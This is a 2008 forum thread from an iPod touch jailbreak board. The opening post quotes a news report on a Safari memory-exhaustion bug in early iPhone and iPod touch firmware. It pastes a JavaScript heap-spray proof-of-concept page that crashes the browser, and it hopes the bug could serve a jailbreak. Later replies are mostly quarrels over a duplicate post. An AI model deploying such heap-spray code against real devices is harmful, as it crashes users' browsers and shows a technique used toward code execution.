New Exploit!!

Discussion in 'iPod touch 1.1.x Jailbreak' started by jimbeam, Feb 7, 2008.

1. jimbeam

jimbeam Active Member

Device:
    iPhone 3G (Black)
    Found this on engadget

It's difficult to tell if this is just a little fear-mongering, or cause for real concern, but it looks like there's another iPhone / touch exploit out there lurking on the unseen horizons of those device's browsers. According to reports, a memory exploit -- similar to the previously-patched TIFF exploit -- has been discovered which affects units with firmware 1.0.2 all the way up to 1.1.3, thus carrying over to new 16GB iPhones and 32GB touches. Apparently, all you have to do is browse over to a site containing the malicious code, and it triggers a memory-exhausting script which causes the phone or iPod to crash. At this point, it doesn't appear to be anything more than a nuisance which can be easily circumvented by disabling JavaScript for Safari, though that hardly qualifies as a fix. To date, Apple hasn't issued a patch for the problem, but keep in mind it's only been a known issue since January 24th

If the appsnapp devs can find this then we can have anouther one tap jailbreak for 1.1.3

<html><body><script>

function Demo() {

var shellcode;
    var addr;
    var fill;

alert('attempting a crash!');
    shellcode = unescape('%u0c0c');
    fill = unescape('%ucccc');
    addr = 0x02020202;

var b = fill;
    while (b.length <= 0x40000) b+=b;

var c = new Array();
    for (var i =0; i<36; i++) {
    c =
    b.substring(0, 0x100000 - shellcode.length) +
    shellcode +
    shellcode +
    shellcode +
    shellcode;
    }

}

</script>

<input type='button' onClick='Demo()' value='Go!'>

</body></html>

http://www.engadget.com/2008/02/07/new-iphone-and-ipod-touch-safari-exploit-discovered/

http://www.iphoneworld.ca/news/2008...tacks-16gb-iphones-and-32gb-apple-ipod-touch/

http://www.iphoneworld.ca/news/2008...e-denial-of-service-vulnerability-discovered/

http://downloads.securityfocus.com/vulnerabilities/exploits/27442.html
  2. iStealth

iStealth New Member

I just read that also, here's hoping it can be done.
  3. Whosthatrandom

Whosthatrandom New Member

If you're posting things like this, please post a link, to prove you're not just making it up... I know I could just google a bit of the text, but that's not the point.
  4. simonrichards150

simonrichards150 New Member

Device:
    iPod touch
  5. phoenix.stu

phoenix.stu New Member

Please Register or Log in to view images

Is there a reason that you HAD to post this twice?? Once, here in the iPod touch Jailbrake" section AND the EXACT SAME POST just 32min before this thread in the "Temporary FIRMWARE 1.1.3 DISCUSSIONS section"

I really don't see your point. Hell, you even have the same title

Please Register or Log in to view images

6. steeped

steeped New Member

Then what is the point? Laziness causes others to do more work?

You browse these forums way too much. You bring up a very valid point though.
  7. jimbeam

jimbeam Active Member

Device:
    iPhone 3G (Black)
    just to piss you off. tell a mod to delete one i wasnt sure were to post it.
  8. phoenix.stu

phoenix.stu New Member

No, actually, I don't. When I click on the New Posts and see two of the same title I think it is quite ridiculous.

No need for me to tell a mod to delete it. If a mod sees that it is in the wrong section, they will move it. Even better than that. If you had any type of common sense, YOU would of asked a mod to move it had it been in the wrong section. Problem easily solved.

Quite frankly, this is a great forum however recently, there are too many numb nuts like yourself that tends to clutter up the boards with posts like the ones that you did. C'mon man, be sensible. Why don't you just use a little common etiquette.
  9. jimbeam

jimbeam Active Member

Device:
    iPhone 3G (Black)
    What’s up your ass? Did you sit on your iPod? I bet that hurts. you should see a doctor.
  10. R I O T

R I O T New Member

Wow, whats the big deal. He made a mistake, deal with it. All you're doing is starting a flame war...